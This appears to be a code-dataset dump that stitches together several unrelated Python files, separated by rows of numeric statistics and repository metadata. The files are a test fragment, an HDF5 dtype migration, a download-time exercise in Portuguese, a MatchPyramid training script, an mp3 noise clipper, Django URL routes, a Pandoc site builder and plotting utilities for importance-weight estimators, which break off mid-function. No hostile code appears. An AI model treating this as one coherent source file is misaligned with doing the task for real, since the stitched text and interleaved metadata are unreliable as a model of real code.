self.assertEqual(len([i for i in glob('utils/*')
if os.path.isfile(i)]), 1)
self.assertEqual(len([i for i in glob('docs/source/*')
if os.path.isfile(i)]), 3)
self.assertEqual(len([i for i in glob('docs/source/modules/*')
if os.path.isfile(i)]), 1)
def test_clean(self):
"""clean up."""
self.pkg_tree.clean()
self.assertFalse(os.path.isdir(self.pkg_tree.tmpdir))
| 42.019417
| 79
| 0.586992
| 1,070
| 8,656
| 4.595327
| 0.135514
| 0.054098
| 0.076063
| 0.06569
| 0.576164
| 0.529184
| 0.478544
| 0.455359
| 0.41265
| 0.377466
| 0
| 0.009107
| 0.26421
| 8,656
| 205
| 80
| 42.22439
| 0.762914
| 0.080291
| 0
| 0.393548
| 0
| 0
| 0.107829
| 0.013367
| 0
| 0
| 0
| 0.004878
| 0.335484
| 1
| 0.109677
| false
| 0
| 0.058065
| 0
| 0.187097
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7b20cd11ee3f48070fe24a5a912f30b91ada5d46
| 1,175
|
py
|
Python
|
utils/migrate_cmds_idx_32bit.py
|
jzuhone/kadi
|
de4885327d256e156cfe42b2b1700775f5b4d6cf
|
[
"BSD-3-Clause"
] | 1
|
2015-07-30T18:33:14.000Z
|
2015-07-30T18:33:14.000Z
|
utils/migrate_cmds_idx_32bit.py
|
jzuhone/kadi
|
de4885327d256e156cfe42b2b1700775f5b4d6cf
|
[
"BSD-3-Clause"
] | 104
|
2015-01-20T18:44:36.000Z
|
2022-03-29T18:51:55.000Z
|
utils/migrate_cmds_idx_32bit.py
|
jzuhone/kadi
|
de4885327d256e156cfe42b2b1700775f5b4d6cf
|
[
"BSD-3-Clause"
] | 2
|
2018-08-23T02:36:08.000Z
|
2020-03-13T19:24:36.000Z
|
from pathlib import Path
import numpy as np
import tables
# Use snapshot from aug08 before the last update that broke things.
with tables.open_file('cmds_aug08.h5') as h5:
cmds = h5.root.data[:]
print(cmds.dtype)
# [('idx', '<u2'), ('date', 'S21'), ('type', 'S12'), ('tlmsid', 'S10'),
# ('scs', 'u1'), ('step', '<u2'), ('timeline_id', '<u4'), ('vcdu', '<i4')]
new_dtype = [('idx', '<i4'), ('date', 'S21'), ('type', 'S12'), ('tlmsid', 'S10'),
('scs', 'u1'), ('step', '<u2'), ('timeline_id', '<u4'), ('vcdu', '<i4')]
new_cmds = cmds.astype(new_dtype)
for name in cmds.dtype.names:
assert np.all(cmds[name] == new_cmds[name])
cmds_h5 = Path('cmds.h5')
if cmds_h5.exists():
cmds_h5.unlink()
with tables.open_file('cmds.h5', mode='a') as h5:
h5.create_table(h5.root, 'data', new_cmds, "cmds", expectedrows=2e6)
# Make sure the new file is really the same except the dtype
with tables.open_file('cmds.h5') as h5:
new_cmds = h5.root.data[:]
for name in cmds.dtype.names:
assert np.all(cmds[name] == new_cmds[name])
if name != 'idx':
assert cmds[name].dtype == new_cmds[name].dtype
assert new_cmds['idx'].dtype.str == '<i4'
| 31.756757
| 85
| 0.613617
| 183
| 1,175
| 3.836066
| 0.36612
| 0.068376
| 0.059829
| 0.076923
| 0.407407
| 0.376068
| 0.307692
| 0.307692
| 0.307692
| 0.307692
| 0
| 0.043744
| 0.163404
| 1,175
| 36
| 86
| 32.638889
| 0.670397
| 0.228085
| 0
| 0.173913
| 0
| 0
| 0.126386
| 0
| 0
| 0
| 0
| 0
| 0.173913
| 1
| 0
| false
| 0
| 0.130435
| 0
| 0.130435
| 0.043478
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7b21a08900385c33387348bb5cf7b32f2eca5c0f
| 579
|
py
|
Python
|
1_estrutura_sequencial/18_velocidade_download.py
|
cecilmalone/lista_de_exercicios_pybr
|
6d7c4aeddf8d1b1d839ad05ef5b5813a8fe611b5
|
[
"MIT"
] | null | null | null |
1_estrutura_sequencial/18_velocidade_download.py
|
cecilmalone/lista_de_exercicios_pybr
|
6d7c4aeddf8d1b1d839ad05ef5b5813a8fe611b5
|
[
"MIT"
] | null | null | null |
1_estrutura_sequencial/18_velocidade_download.py
|
cecilmalone/lista_de_exercicios_pybr
|
6d7c4aeddf8d1b1d839ad05ef5b5813a8fe611b5
|
[
"MIT"
] | null | null | null |
"""
18. Faça um programa que peça o tamanho de um arquivo para download (em MB) e
a velocidade de um link de Internet (em Mbps), calcule e informe o tempo
aproximado de download do arquivo usando este link (em minutos).
"""
mb_arquivo = float(input('Informe o tamanho de um arquivo para download (em MB): '))
mbps_link = float(input('Informe a velocidade do link de Internet (em Mbps): '))
velocidade_segundos = mb_arquivo / mbps_link
velocidade_minutos = velocidade_segundos / 60
print('O tempo aproximado para download do arquivo é de %d minuto(s).' %velocidade_minutos)
| 38.6
| 91
| 0.753022
| 93
| 579
| 4.602151
| 0.397849
| 0.028037
| 0.046729
| 0.056075
| 0.257009
| 0.163551
| 0.163551
| 0.163551
| 0.163551
| 0
| 0
| 0.008264
| 0.164076
| 579
| 14
| 92
| 41.357143
| 0.876033
| 0.374784
| 0
| 0
| 0
| 0
| 0.478754
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.2
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7b2304794deb520b2f5f87d0e37dcca35db22896
| 4,802
|
py
|
Python
|
src/rte_pac/train_pyramid.py
|
UKPLab/conll2019-snopes-experiments
|
102f4a05cfba781036bd3a7b06022246e53765ad
|
[
"Apache-2.0"
] | 5
|
2019-11-08T09:17:07.000Z
|
2022-01-25T19:37:06.000Z
|
src/rte_pac/train_pyramid.py
|
UKPLab/conll2019-snopes-experiments
|
102f4a05cfba781036bd3a7b06022246e53765ad
|
[
"Apache-2.0"
] | 18
|
2020-01-28T22:17:34.000Z
|
2022-03-11T23:57:22.000Z
|
src/rte_pac/train_pyramid.py
|
UKPLab/conll2019-snopes-experiments
|
102f4a05cfba781036bd3a7b06022246e53765ad
|
[
"Apache-2.0"
] | 1
|
2021-03-08T12:02:24.000Z
|
2021-03-08T12:02:24.000Z
|
import argparse
import pickle
import os
import json
from sklearn.metrics import confusion_matrix
from utils.data_reader import embed_data_sets_with_glove, embed_data_set_given_vocab, prediction_2_label
from utils.text_processing import vocab_map
from common.util.log_helper import LogHelper
from deep_models.MatchPyramid import MatchPyramid
def _instantiate_model(param):
return MatchPyramid(random_state=55, tensorboard_logdir="logdir/", dropout_rate=0.15, learning_rate=0.0001, batch_size=32,
num_sents=param['max_sent'], embedding=param['embeddings'], show_progress=1, h_max_length=param['max_sent_size'],
s_max_length=param['max_sent_size'], word_dict=param['vocab'])
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--mode', help='\'train\' or \'test\'', required=True)
parser.add_argument('--train', help='/path/to/training/set')
parser.add_argument('--valid', help='/path/to/validation/set')
parser.add_argument('--test', help='/path/to/test/set')
parser.add_argument('--model', help='/path/to/model/file', required=True)
parser.add_argument(
'--save-data', help='/path/to/save/data', default="data/rte/train/")
parser.add_argument('--load-data', help='/path/to/load/data/file')
parser.add_argument('--db', help='/path/to/data/base', required=True)
parser.add_argument(
'--max-sent', type=int, help='Maximal number of sentences per claim', default=5)
parser.add_argument('--embed', help='/path/to/embedding')
parser.add_argument(
'--save-result', help='/path/to/save/result', default="data/rte/result/")
args = parser.parse_args()
LogHelper.setup()
logger = LogHelper.get_logger(args.mode)
if args.mode == 'train':
assert args.train is not None or args.load_data is not None, "--train training set or --load-data should be provided in train mode"
assert args.embed is not None, "--embed should be provided in train mode"
# training mode
if args.load_data:
# load pre-processed training data
with open(args.load_data, "rb") as file:
param = pickle.load(file)
else:
# process training JSONL file
paths = [args.train, args.valid]
dataset_list, vocab, embeddings, b_max_sent_num, b_max_sent_size = embed_data_sets_with_glove(
paths, args.db, args.embed, threshold_b_sent_num=args.max_sent)
vocab = vocab_map(vocab)
param = {
'dataset_list': dataset_list,
'vocab': vocab,
'embeddings': embeddings,
'max_sent_size': b_max_sent_size,
'max_sent': args.max_sent
}
# save processed training data
os.makedirs(args.save_data, exist_ok=True)
train_data_path = os.path.join(
args.save_data, "train.{}.s{}.p".format("matchpyramid", str(args.max_sent)))
with open(train_data_path, "wb") as file:
pickle.dump(param, file, protocol=pickle.HIGHEST_PROTOCOL)
pyramid = _instantiate_model(param)
pyramid.fit(param['dataset_list'][0]['data'], param['dataset_list'][0]['label'],
param['dataset_list'][1]['data'], param['dataset_list'][1]['label'])
pyramid.save(args.model)
else:
# testing mode
assert args.load_data is not None, "--load_data should be provided in test mode"
assert args.test is not None, "--test test set should be provided in test mode"
with open(args.load_data, "rb") as file:
param = pickle.load(file)
pyramid = _instantiate_model(param)
pyramid.restore_model(args.model)
data_set = embed_data_set_given_vocab(args.test, args.db, param['vocab'], threshold_b_sent_num=param['max_sent'],
threshold_b_sent_size=param['max_sent_size'], threshold_h_sent_size=param['max_sent_size'])
os.makedirs(args.save_result, exist_ok=True)
test_result_path = os.path.join(
args.save_result, "predicted.pyramid.s{}.jsonl".format(param['max_sent']))
with open(test_result_path, "w") as result_file:
predictions = pyramid.predict(data_set['data'])
for i, prediction in enumerate(predictions):
data = {'predicted': prediction_2_label(prediction)}
if 'label' in data_set:
data['label'] = prediction_2_label(data_set['label'][i])
result_file.write(json.dumps(data) + "\n")
if 'label' in data_set:
logger.info("Confusion Matrix:")
logger.info(confusion_matrix(data_set['label'], predictions))
| 52.195652
| 139
| 0.641399
| 629
| 4,802
| 4.667727
| 0.246423
| 0.038147
| 0.063692
| 0.021798
| 0.230586
| 0.13624
| 0.032016
| 0.032016
| 0.032016
| 0.032016
| 0
| 0.005682
| 0.230321
| 4,802
| 91
| 140
| 52.769231
| 0.78869
| 0.024157
| 0
| 0.160494
| 0
| 0
| 0.189103
| 0.020085
| 0
| 0
| 0
| 0
| 0.049383
| 1
| 0.012346
| false
| 0
| 0.111111
| 0.012346
| 0.135802
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7b2354c08ba6d3f70427aa659e1ba9d3a3e03c13
| 854
|
py
|
Python
|
annotation/helpers/helpers/extract_noise.py
|
jim-schwoebel/allie
|
d85db041b91c81dfb3fd1a4d719b5aaaf3b6697e
|
[
"Apache-2.0"
] | 87
|
2020-08-07T09:05:11.000Z
|
2022-01-24T00:48:22.000Z
|
annotation/helpers/helpers/extract_noise.py
|
jim-schwoebel/allie
|
d85db041b91c81dfb3fd1a4d719b5aaaf3b6697e
|
[
"Apache-2.0"
] | 87
|
2020-08-07T19:12:10.000Z
|
2022-02-08T14:46:34.000Z
|
annotation/helpers/helpers/extract_noise.py
|
jim-schwoebel/allie
|
d85db041b91c81dfb3fd1a4d719b5aaaf3b6697e
|
[
"Apache-2.0"
] | 25
|
2020-08-07T20:03:08.000Z
|
2022-03-16T07:33:25.000Z
|
import shutil, os, random
from pydub import AudioSegment
try:
os.mkdir('noise')
except:
shutil.rmtree('noise')
os.mkdir('noise')
def extract_noise(filename, length):
song = AudioSegment.from_mp3(filename)
first = song[100:100+length]
first.export(filename[0:-4]+'_noise.mp3')
shutil.move(os.getcwd()+'/'+filename[0:-4]+'_noise.mp3', os.getcwd()+'/noise/'+filename[0:-4]+'_noise.mp3')
listdir=os.listdir()
mp3files=list()
for i in range(len(listdir)):
if listdir[i][-4:]=='.mp3':
mp3files.append(listdir[i])
random.shuffle(mp3files)
for i in range(len(mp3files)):
extract_noise(mp3files[i],300)
if i == 100:
break
os.chdir('noise')
listdir=os.listdir()
for i in range(len(listdir)):
if listdir[i][-4:]=='.mp3':
os.system('play %s'%(listdir[i]))
remove=input('should remove? type y to remove')
if remove=='y':
os.remove(listdir[i])
| 27.548387
| 108
| 0.688525
| 134
| 854
| 4.343284
| 0.358209
| 0.068729
| 0.051546
| 0.07732
| 0.237113
| 0.120275
| 0.120275
| 0.120275
| 0.120275
| 0.120275
| 0
| 0.04047
| 0.103045
| 854
| 30
| 109
| 28.466667
| 0.719321
| 0
| 0
| 0.266667
| 0
| 0
| 0.122951
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.033333
| false
| 0
| 0.066667
| 0
| 0.1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7b248b5ee36bb65d830c7b56e66b0b390aa45baa
| 1,030
|
py
|
Python
|
ARMODServers/Apps/Apiv2/urls.py
|
Phantomxm2021/ARMOD-Dashboard
|
383cf0a5e72dc5a2651f43e693f06773d5b88bbd
|
[
"Apache-2.0"
] | 1
|
2021-11-04T09:03:27.000Z
|
2021-11-04T09:03:27.000Z
|
ARMODServers/Apps/Apiv2/urls.py
|
Phantomxm2021/ARMOD-Dashboard
|
383cf0a5e72dc5a2651f43e693f06773d5b88bbd
|
[
"Apache-2.0"
] | null | null | null |
ARMODServers/Apps/Apiv2/urls.py
|
Phantomxm2021/ARMOD-Dashboard
|
383cf0a5e72dc5a2651f43e693f06773d5b88bbd
|
[
"Apache-2.0"
] | null | null | null |
from django.conf.urls import url
from Apps.Apiv2.views import GetARResourcesView, GetARExperienceDetailView
from Apps.Apiv2.views import GetTagListView,GetARExperienceRecommendList,GetARExperiencePublicListView,GetARExperiencesView
from Apps.Apiv2.views import GetARexperienceByTagsListView
app_name = 'Apps.Users'
urlpatterns = [
url(r'^getarresources$', GetARResourcesView.as_view(), name='getarresources'),
url(r'^getarexperience$', GetARExperienceDetailView.as_view(), name='getarexperience'),
url(r'^getarexperiencelist$', GetARExperiencesView.as_view(), name='getarexperience'),
url(r'^gettaglist$', GetTagListView.as_view(), name='getshowcasetags'),
url(r'^getrecommendslist$', GetARExperienceRecommendList.as_view(), name='getshowcaserecommends'),
url(r'^getarexperiencepubliclist$', GetARExperiencePublicListView.as_view(), name='getarexperiencepubliclist'),
url(r'^getarexperiencebytagslist$', GetARexperienceByTagsListView.as_view(), name='getarexperiencebytagslist'),
# api/v2/
]
| 60.588235
| 123
| 0.794175
| 91
| 1,030
| 8.901099
| 0.373626
| 0.034568
| 0.08642
| 0.066667
| 0.160494
| 0.071605
| 0
| 0
| 0
| 0
| 0
| 0.004233
| 0.082524
| 1,030
| 17
| 124
| 60.588235
| 0.85291
| 0.006796
| 0
| 0
| 0
| 0
| 0.272994
| 0.142857
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.285714
| 0
| 0.285714
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7b24aa6646e92566319ce68092ddf4db0af43da1
| 2,600
|
py
|
Python
|
make.py
|
loicseguin/astronomie
|
b489d615adb136991ff3fc82ca06c4f6791ca8c6
|
[
"BSD-2-Clause"
] | null | null | null |
make.py
|
loicseguin/astronomie
|
b489d615adb136991ff3fc82ca06c4f6791ca8c6
|
[
"BSD-2-Clause"
] | 7
|
2020-01-19T21:27:07.000Z
|
2020-01-19T21:28:09.000Z
|
make.py
|
loicseguin/astronomie
|
b489d615adb136991ff3fc82ca06c4f6791ca8c6
|
[
"BSD-2-Clause"
] | null | null | null |
"""Construit le site Explorer et comprendre l'Univers, incluant les diapositives
et le livre. Le logiciel Pandoc est utilisé pour obtenir des présentations
dans différents formats.
On peut construire tous les fichiers html avec la commande
$ python make.py
"""
import subprocess
import os
import sys
# Dossiers de présentation
DIAPOS_DIRS = [os.path.join('diapos', d) for d in os.listdir('diapos')
if d != 'reveal.js']
def run(call_str):
"""Exécute la chaîne de caractère sur la ligne de commande."""
try:
subprocess.check_call(call_str.split())
print("complet!")
except subprocess.CalledProcessError as e:
print(call_str, end='... ')
print("erreur, la compilation a échoué")
def revealjs(in_fname, out_fname):
"""Crée une présentation avec la librairie javascript Reveal.js."""
call_str = "pandoc -t revealjs " \
"-V revealjs-url=../reveal.js -s " \
"--slide-level=1 " \
"--mathjax {} -o {}".format(in_fname, out_fname)
run(call_str)
def diapos():
"""Construits les fichiers HTML des diapositives."""
cwd = os.getcwd()
for folder in DIAPOS_DIRS:
try:
os.chdir(folder)
except (FileNotFoundError, NotADirectoryError):
os.chdir(cwd)
continue
# Déterminer le nom du fichier source.
for fname in os.listdir():
if fname.endswith(".md"):
break
else:
os.chdir(cwd)
continue
in_fname = fname
out_fname = "{}.html".format(os.path.splitext(os.path.basename(fname))[0])
print("{}: ".format(folder), end='')
revealjs(in_fname, out_fname)
os.chdir(cwd)
def livre():
"""Construit les fichiers HTML du livre."""
for fname in os.listdir('livre'):
if not fname.endswith('.md'):
continue
in_fname = os.path.join('livre', fname)
out_fname = os.path.join(
'livre',
'{}.html'.format(os.path.splitext(os.path.basename(fname))[0]))
call_str = 'pandoc -s -c ../www/style.css --mathjax ' \
'--template www/book-template.html ' \
'--include-after-body www/sidebar.html ' \
'--include-after-body www/footer.html ' \
'{} -o {}'.format(in_fname, out_fname)
print("{}: ".format(in_fname), end='')
run(call_str)
if __name__ == '__main__':
if len(sys.argv) != 1:
print("usage: python make.py\n")
exit()
diapos()
livre()
| 30.232558
| 82
| 0.576154
| 317
| 2,600
| 4.62776
| 0.416404
| 0.02863
| 0.05317
| 0.0409
| 0.205862
| 0.08998
| 0.059986
| 0.059986
| 0.059986
| 0.059986
| 0
| 0.002163
| 0.288846
| 2,600
| 85
| 83
| 30.588235
| 0.791239
| 0.202692
| 0
| 0.172414
| 0
| 0
| 0.18591
| 0.022994
| 0
| 0
| 0
| 0
| 0
| 1
| 0.068966
| false
| 0
| 0.051724
| 0
| 0.12069
| 0.103448
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7b26132c0d8b78762b805dd6438fa5d2c8d060b1
| 13,370
|
py
|
Python
|
plotting/utils.py
|
plai-group/amortized-rejection-sampling
|
1e85253ae1e6ef1c939e1c488e55f9d95ee48355
|
[
"MIT"
] | null | null | null |
plotting/utils.py
|
plai-group/amortized-rejection-sampling
|
1e85253ae1e6ef1c939e1c488e55f9d95ee48355
|
[
"MIT"
] | null | null | null |
plotting/utils.py
|
plai-group/amortized-rejection-sampling
|
1e85253ae1e6ef1c939e1c488e55f9d95ee48355
|
[
"MIT"
] | null | null | null |
import numpy as np
import torch
from tqdm import tqdm
import matplotlib as mpl
# https://gist.github.com/thriveth/8560036
color_cycle = ['#377eb8', '#ff7f00', '#4daf4a',
'#f781bf', '#a65628', '#984ea3',
'#999999', '#e41a1c', '#dede00']
labels_dict = {"ic": "IC",
"prior": "Prior",
"ars-1": r"$\mathrm{ARS}_{M=1}$",
"ars-2": r"$\mathrm{ARS}_{M=2}$",
"ars-5": r"$\mathrm{ARS}_{M=5}$",
"ars-10": r"$\mathrm{ARS}_{M=10}$",
"ars-20": r"$\mathrm{ARS}_{M=20}$",
"ars-50": r"$\mathrm{ARS}_{M=50}$",
"biased": "Biased",
"gt": "Groundtruth",
"is": "IS",
"collapsed": "Collapsed"}
color_dict = {'gt': color_cycle[0],
'prior': color_cycle[5],
'ic': color_cycle[2],
'biased': color_cycle[3],
'ars-1': color_cycle[4],
'ars-2': color_cycle[1],
'ars-5': color_cycle[7],
'ars-10': color_cycle[6],
'ars-100': color_cycle[8],
'ars-50': color_cycle[8],
'is': color_cycle[8],
'ars-20': "C1",
"collapsed": color_cycle[7]}
########################################
## matplotlib style and configs ##
########################################
def setup_matplotlib():
import seaborn as sns
# mpl.use('Agg')
# plt.style.use('classic')
# sns.set(font_scale=1.5)
sns.set_style('white')
sns.color_palette('colorblind')
nice_fonts = {
# Use LaTeX to write all text
"text.usetex": True,
'text.latex.preamble': r'\usepackage{amsfonts}',
"font.family": "serif",
# Use 10pt font in plots, to match 10pt font in document
"axes.labelsize": 10,
"font.size": 10,
# Make the legend/label fonts a little smaller
"legend.fontsize": 8,
"xtick.labelsize": 7,
"ytick.labelsize": 7,
}
mpl.rcParams.update(nice_fonts)
def set_size(width, fraction=1, subplots=(1, 1)):
# https://jwalton.info/Embed-Publication-Matplotlib-Latex/
""" Set aesthetic figure dimensions to avoid scaling in latex.
Parameters
----------
width: float
Width in pts
fraction: float
Fraction of the width which you wish the figure to occupy
subplots: array-like, optional
The number of rows and columns of subplots.
Returns
-------
fig_dim: tuple
Dimensions of figure in inches
"""
if width == 'thesis':
width_pt = 426.79135
elif width == 'beamer':
width_pt = 307.28987
elif width == 'pnas':
width_pt = 246.09686
elif width == 'aistats22':
width_pt = 487.8225
else:
width_pt = width
# Width of figure
fig_width_pt = width_pt * fraction
# Convert from pt to inches
inches_per_pt = 1 / 72.27
# Golden ratio to set aesthetic figure height
golden_ratio = (5**.5 - 1) / 2
# Figure width in inches
fig_width_in = fig_width_pt * inches_per_pt
# Figure height in inches
fig_height_in = fig_width_in * golden_ratio * (subplots[0] / subplots[1])
return (fig_width_in, fig_height_in)
class OOMFormatter(mpl.ticker.ScalarFormatter):
"""OrderOfMagnitude formatter
Source:
https://stackoverflow.com/questions/42656139/set-scientific-notation-with-fixed-exponent-and-significant-digits-for-multiple
"""
def __init__(self, order=0, fformat="%1.1f", *args, **kwargs):
self.oom = order
self.fformat = fformat
mpl.ticker.ScalarFormatter.__init__(self,*args, **kwargs)
def _set_order_of_magnitude(self):
super()._set_order_of_magnitude()
self.orderOfMagnitude = self.oom
def add_center_aligned_legend(fig, handles, ncol, **kwargs):
nlines = len(handles)
leg1 = fig.legend(handles=handles[:nlines//ncol*ncol], ncol=ncol, **kwargs)
if nlines % ncol != 0:
fig.add_artist(leg1)
leg2 = fig.legend(handles=handles[nlines//ncol*ncol:], ncol=nlines-nlines//ncol*ncol)
leg2.remove()
leg1._legend_box._children.append(leg2._legend_handle_box)
leg1._legend_box.stale = True
########################################
## Loading from disk ##
########################################
def load_log_weights(log_weights_root, iw_mode):
"""Loads the log_weights from the disk. It assumes a file structure of <log_weights_root>/<iw_mode>/*.npy
of mulyiple npy files. This function loads all the weights in a single numpy array, concatenating all npy files.
Finally, it caches the result in a file stored at <log_weights_root>/<iw_mode>.npy
In the further calls, it reuses the cached file.
Args:
log_weights_root (str or pathlib.Path)
iw_mode (str)
Returns:
np.ndarray: log importance weights
"""
agg_weights_file = log_weights_root / f"{iw_mode}.npy"
agg_weights_dir = log_weights_root / iw_mode
assert agg_weights_dir.exists() or agg_weights_file.exists()
if not agg_weights_file.exists():
log_weights = np.concatenate(
[np.load(weight_file) for weight_file in agg_weights_dir.glob("*.npy")])
np.save(agg_weights_file, log_weights)
else:
log_weights = np.load(agg_weights_file)
print(f"{log_weights_root} / {iw_mode} has {len(log_weights):,} traces")
return log_weights
########################################
## Estimators and metrics ##
########################################
def _compute_estimator_helper(log_weights, dx, estimator_func, **kwargs):
"""A helper function for computing the plotting data. It generates the
x-values and y-values of the plot. x-values is an increasing sequence of
integers, with incremens of dx and ending with N. y-values is a TxK tensor
where T is the number of trials and K is the size of x-values. The j-th
column of y-values is the estimator applied to the log_weights up to the
corresponding x-value.
Args:
log_weights (torch.FloatTensor of shape TxN): All the log importance weights
of a particular experiment.
dx (int): different between points of evaluating the estimator.
estimator_func (function): the estimator function that operates on a tensor
of shape Txn where n <= N.
**kwargs: optional additional arguments to the estimator function
"""
(T, N) = log_weights.shape
xvals = _get_xvals(end=N, dx=dx)
yvals_all = [estimator_func(log_weights[:, :x], **kwargs) for x in xvals]
yvals_all = torch.stack(yvals_all, dim=1)
return xvals, yvals_all
def _get_xvals(end, dx):
"""Returns a integer numpy array of x-values incrementing by "dx"
and ending with "end".
Args:
end (int)
dx (int)
"""
arange = np.arange(0, end-1+dx, dx, dtype=int)
xvals = arange[1:]
return xvals
def _log_evidence_func(arr):
"""Returns an estimate of the log evidence from a set of log importance wegiths
in arr. arr has shape TxN where T is the number of trials and N is the number
of samples for estimation.
Args:
arr (torch.FloatTensor of shape TxN): log importance weights
Returns:
A tensor of shape (T,) representing the estimates for each set of sampels.
"""
T, N = arr.shape
log_evidence = torch.logsumexp(arr, dim=1) - np.log(N)
return log_evidence
def _ess_func(arr):
"""Effective sample size (ESS)"""
a = torch.logsumexp(arr, dim=1) * 2
b = torch.logsumexp(2 * arr, dim=1)
return torch.exp(a - b)
def _ess_inf_func(arr):
"""ESS-infinity (Q_n)"""
a = torch.max(arr, dim=1)[0]
b = torch.logsumexp(arr, dim=1)
return torch.exp(a - b)
def get_evidence_estimate(log_weights, dx):
return _compute_estimator_helper(log_weights, estimator_func=lambda x: _log_evidence_func(x).exp(), dx=dx)
def get_log_evidence_estimate(log_weights, dx):
return _compute_estimator_helper(log_weights, estimator_func=_log_evidence_func, dx=dx)
def get_ess(log_weights, dx):
return _compute_estimator_helper(log_weights, estimator_func=_ess_func, dx=dx)
def get_ness(log_weights, dx):
"""Normalized ESS (ESS / N)"""
xvals, yvals = get_ess(log_weights, dx=dx)
return xvals, yvals / xvals
def get_qn(log_weights, dx):
return _compute_estimator_helper(log_weights, estimator_func=_ess_inf_func, dx=dx)
########################################
## Plotting functions ##
########################################
def _lineplot_helper(*, name, func, ax, log_weights_dict, iw_mode_list, dx, bias=None, **kwargs):
"""A helper function for making the line functions of the paper.
Args:
name (string): Metric name. Used for logging only.
func (function): The metric computation function. Should be a function that takes in log_weights and dx
and returns x-values and y-values. Any additional arguments in kwargs will be passed to this function.
ax (matplotlib.axes): A matrplotlib ax object in which the plot should be drawn.
log_weights_dict (dict): A dictionary of the form {iw_mode: log_imprtance_weights as a TxN tensor}
iw_mode_list (list): An ordered list of iw modes specifying the order of drawing the lines.
dx (int): The distance between consequent x-values.
bias (float, optional): If not None, shifts all the line's y-values according to it. Defaults to None.
"""
for iw_mode in tqdm(iw_mode_list, desc=name):
if iw_mode not in log_weights_dict:
print(f"Skipping {iw_mode}.")
continue
log_weights = torch.tensor(log_weights_dict[iw_mode])
label = labels_dict[iw_mode]
color = color_dict[iw_mode]
xs, ys_all = func(log_weights, dx=dx)
means = ys_all.mean(dim=0)
stds = ys_all.std(dim=0)
if bias is not None:
means -= bias
ax.plot(xs, means, color=color, label=label)
ax.fill_between(xs, means - stds, means + stds, color=color, alpha=0.2)
print(f"> ({name}) {iw_mode, means[-1].item(), stds[-1].item()}")
def plot_evidence(**kwargs):
_lineplot_helper(name="Evidence plot", func=get_evidence_estimate, **kwargs)
def plot_log_evidence(**kwargs):
_lineplot_helper(name="Evidence plot", func=get_log_evidence_estimate, **kwargs)
def plot_ness(**kwargs):
_lineplot_helper(name="NESS plot", func=get_ness, **kwargs)
def plot_qn(**kwargs):
_lineplot_helper(name="Qn plot", func=get_qn, **kwargs)
def plot_convergence(ax, log_weights_dict, dx, iw_mode_list,
qn_threshold, n_splits=10):
plot_labels = []
plot_x = []
for iw_mode in tqdm(iw_mode_list, desc="Convergence plot"):
if iw_mode not in log_weights_dict:
print(f"Skipping {iw_mode}.")
continue
log_weights = torch.tensor(log_weights_dict[iw_mode])
label = labels_dict[iw_mode]
xs, qns_all = get_qn(log_weights, dx=dx)
assert qns_all.shape[0] % n_splits == 0, f"The number of trials ({qns_all.shape[0]}) should be divisible by {n_splits}"
qns_all = qns_all.reshape(n_splits, qns_all.shape[0] // n_splits, -1)
qn_means = qns_all.mean(dim=0)
print(f"> (Convergence plot) {iw_mode, qn_means.mean(dim=0)[-1].item()} out of {log_weights.shape[-1]} samples")
converged = (qn_means < qn_threshold).cpu().numpy()
plot_labels.append(label)
if not converged.any(axis=-1).all(): # Some of them are not converged ever
plot_x.append([])
else:
plot_x.append(converged.argmax(axis=-1) * dx)
ax.boxplot(plot_x, labels=plot_labels, showmeans=True, meanline=True)
def plot_convergence_2(ax, log_weights_dict, dx, iw_mode_list, qn_threshold):
# Source: https://stackoverflow.com/questions/33328774/box-plot-with-min-max-average-and-standard-deviation/33330997
plot_labels = []
plot_x = []
for iw_mode in tqdm(iw_mode_list, desc="Convergence plot"):
if iw_mode not in log_weights_dict:
print(f"Skipping {iw_mode}.")
continue
log_weights = torch.tensor(log_weights_dict[iw_mode])
label = labels_dict[iw_mode]
xs, qns_all = get_qn(log_weights, dx=dx)
assert qns_all.shape[0] % 10 == 0
